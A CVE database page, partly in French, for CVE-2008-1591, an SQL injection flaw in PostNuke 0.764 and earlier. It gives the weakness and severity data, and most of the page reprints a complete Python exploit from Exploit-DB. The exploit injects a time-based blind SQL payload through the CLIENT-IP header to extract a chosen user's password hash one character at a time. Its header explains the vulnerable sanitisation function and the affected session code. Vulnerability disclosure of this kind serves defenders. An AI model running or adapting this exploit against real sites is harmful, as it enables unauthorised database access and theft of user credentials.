CVE-2008-1591
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
The pnVarPrepForStore function in PostNuke 0.764 and earlier skips input sanitization when magic_quotes_runtime is enabled, which allows remote attackers to conduct SQL injection attacks and execute arbitrary SQL commands via input associated with server variables, as demonstrated by the CLIENT_IP HTTP header (HTTP_CLIENT_IP variable).
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 5292
Date de publication : 2008-03-20 23h00 +00:00
Auteur : The:Paradox
EDB Vérifié : Yes
#!/usr/bin/python
#=================================================================================================#
# ____ __________ __ ____ __ #
# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #
# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ #
# | | | \ | |/ \ \___| | /_____/ | || | #
# |___|___| /\__| /______ /\___ >__| |___||__| #
# \/\______| \/ \/ #
#=================================================================================================#
# This was a priv8 Exploit #
#=================================================================================================#
# Postnuke <= 0.764 #
# Blind Sql Injection Vulnerability #
# Benchmark Method #
# #
# Vendor: www.postnuke.com #
# Severity: High #
# Author: The:Paradox #
#=================================================================================================#
# Proud To Be Italian. #
#====================================#============================================================#
# Proof Of Concept / Bug Explanation # #
#====================================# #
# Postnuke presents a critical vulnerability in pnVarPrepForStore() function. Let's see source: #
# #
# #
# 1. function pnVarPrepForStore() #
# 2. { #
# 3. $resarray = array(); #
# 4. foreach (func_get_args() as $ourvar) { #
# 5. if (!get_magic_quotes_runtime() && !is_array($ourvar)) { #
# 6. $ourvar = addslashes($ourvar); #
# 7. } #
# 8. // Add to array #
# 9. array_push($resarray, $ourvar); #
# 10. } #
# 11. // Return vars #
# 12. if (func_num_args() == 1) { #
# 13. return $resarray[0]; #
# 14. } else { #
# 15. return $resarray; #
# 16. } #
# 17. } #
# #
# This function is used to prepare vars for sql queries. It "add slashes" to given variables. #
# But wat happens if get_magic_quotes_runtime() is On in Server Configuration? #
# The script does nothing 'cause variables should be already cleaned. #
# #
# Whatever the script author didn't thought about Server Variables: they are untouched by #
# magic_quotes_gpc and magic_quotes_runtime(). #
# Therefore all Server Variables are not propelly checked with magic_quotes_runtime() On #
# #
# In this exploit I will inject Sql code in HTTP_CLIENT_IP header, see pnSessionInit() function. #
#=================================================================================================#
# Use this at your own risk. You are responsible for your own deeds. #
#=================================================================================================#
"""
Related Codes:
function pnSessionInit()
{
$dbconn =& pnDBGetConn(true);
$pntable =& pnDBGetTables();
// First thing we do is ensure that there is no attempted pollution
// of the session namespace
foreach($GLOBALS as $k => $v) {
if (substr($k,0,4) == 'PNSV') {
return false;
}
}
// Kick it
session_start();
// Have to re-write the cache control header to remove no-save, this
// allows downloading of files to disk for application handlers
// adam_baum - no-cache was stopping modules (andromeda) from caching the playlists, et al.
// any strange behaviour encountered, revert to commented out code.
// Header('Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0');
Header('Cache-Control: cache');
$sessid = session_id();
// Get (actual) client IP addr
$ipaddr = pnServerGetVar('REMOTE_ADDR');
if (empty($ipaddr)) {
$ipaddr = pnServerGetVar('HTTP_CLIENT_IP');
}
$tmpipaddr = pnServerGetVar('HTTP_CLIENT_IP');
if (!empty($tmpipaddr)) {
$ipaddr = $tmpipaddr;
}
$fwdipaddr = pnServerGetVar('HTTP_X_FORWARDED_FOR');
if (!empty($fwdipaddr) AND strpos($fwdipaddr, ',') !== false) {
$fwdipaddr = substr($fwdipaddr,0, strpos($fwdipaddr, ','));
}
$tmpipaddr = $fwdipaddr;
if (!empty($tmpipaddr) AND strpos($tmpipaddr, ',') !== false) {
$ipaddr = substr($tmpipaddr,0, strpos($tmpipaddr, ','));
}
$sessioninfocolumn = &$pntable['session_info_column'];
$sessioninfotable = $pntable['session_info'];
$query = "SELECT $sessioninfocolumn[ipaddr]
FROM $sessioninfotable
WHERE $sessioninfocolumn[sessid] = '" . pnVarPrepForStore($sessid) . "'";
$result =& $dbconn->Execute($query);
if ($dbconn->ErrorNo() != 0) {
return false;
}
if (!$result->EOF) {
// jgm - this has been commented out so that the nice AOL people
// can view PN pages, will examine full implications of this
// later
// list($dbipaddr) = $result->fields;
$result->Close();
// if ($ipaddr == $dbipaddr) {
pnSessionCurrent($sessid);
// } else {
// // Mismatch - destroy the session
// session_destroy();
// pnRedirect('index.php');
// return false;
// }
} else {
pnSessionNew($sessid, $ipaddr);
// Generate a random number, used for
// some authentication
srand((double)microtime() * 1000000);
pnSessionSetVar('rand', rand());
}
return true;
}
function pnSessionNew($sessid='', $ipaddr='')
{
$dbconn =& pnDBGetConn(true);
$pntable =& pnDBGetTables();
$sessioninfocolumn = &$pntable['session_info_column'];
$sessioninfotable = $pntable['session_info'];
$query = "INSERT INTO $sessioninfotable
($sessioninfocolumn[sessid],
$sessioninfocolumn[ipaddr],
$sessioninfocolumn[uid],
$sessioninfocolumn[firstused],
$sessioninfocolumn[lastused])
VALUES
('" . pnVarPrepForStore($sessid) . "',
'" . pnVarPrepForStore($ipaddr) . "', <-- Injection! =)
0,
" . time() . ",
" . time() . ")";
$dbconn->Execute($query);
if ($dbconn->ErrorNo() != 0) {
return false;
}
return true;
}
"""
#=================================================================================================#
# Python Exploit Starts #
#=================================================================================================#
from httplib import HTTPConnection
from time import time
from sys import exit, argv, stdout
print """
#=================================================================#
# Postnuke <= 0.764 #
# Blind Sql Injection Vulnerability #
# Benchmark Method #
# #
# Discovered By The:Paradox #
# #
# Usage: #
# ./pwnpn [Target] [Path] [User_id] #
# #
# Example: #
# ./pwnpn localhost /PostNuke/ 2 #
# ./pwnpn www.host.com / 2 #
#=================================================================#
"""
if len(argv)<=3: exit()
else: print "[.]Exploit Starting."
prefix = "pn_"
benchmark = "230000000"
vtime = 6
port = 80
target = argv[1]
path = argv[2]
uid = argv[3]
j=1
h4sh = ""
ht = []
for k in range(48,58):
ht.append(k)
for k in range(97,103):
ht.append(k)
ht.append(0)
# Result Query:
# INSERT INTO pn_session_info( pn_session_info.pn_sessid, pn_session_info.pn_ipaddr, pn_session_info.pn_uid, pn_session_info.pn_firstused, pn_session_info.pn_lastused )
# VALUES ('6bc3cf4c67bb4c3b24bdd38dcd8e1b5b', '127.0.0.1', (SELECT IF((ASCII(SUBSTRING(PASSWORD,1,1))=48),benchmark(300000000, CHAR(0)), 0)
# FROM pn_users WHERE pn_uid =1)/*', 0, 0, 0)
print "[.]Blind Sql Injection Starts.\n\nHash:"
while j <= 32:
for i in ht:
if i == 0: exit('[-]Exploit Failed.\n')
start = time()
conn = HTTPConnection(target,port)
conn.request("GET", path + "index.php", {}, {"Accept": "text/plain","CLIENT-IP": "127.0.0.1',(SELECT IF((ASCII(SUBSTRING(pn_pass," + str(j) + ",1))=" + str(i) + "),benchmark(" + benchmark + ",CHAR(0)),0) FROM " + prefix + "users WHERE pn_uid=" + uid + "), 0, 0)/*"})
response = conn.getresponse()
read = response.read()
if response.status == 404: exit('[-]Error 404. Not Found.')
now = time()
if now - start > vtime:
stdout.write(chr(i))
stdout.flush()
h4sh += chr(i)
j += 1
break;
print "\n\n[+]All Done.\n-=Paradox Got This One=-"
# milw0rm.com [2008-03-21]
Products Mentioned
Configuraton 0
Postnuke>>Postnuke >> Version To (including) 0.764
- Postnuke>>Postnuke >> Version 0.750 (Open CPE detail)
- Postnuke>>Postnuke >> Version 0.760 (Open CPE detail)
- Postnuke>>Postnuke >> Version 0.760 (Open CPE detail)
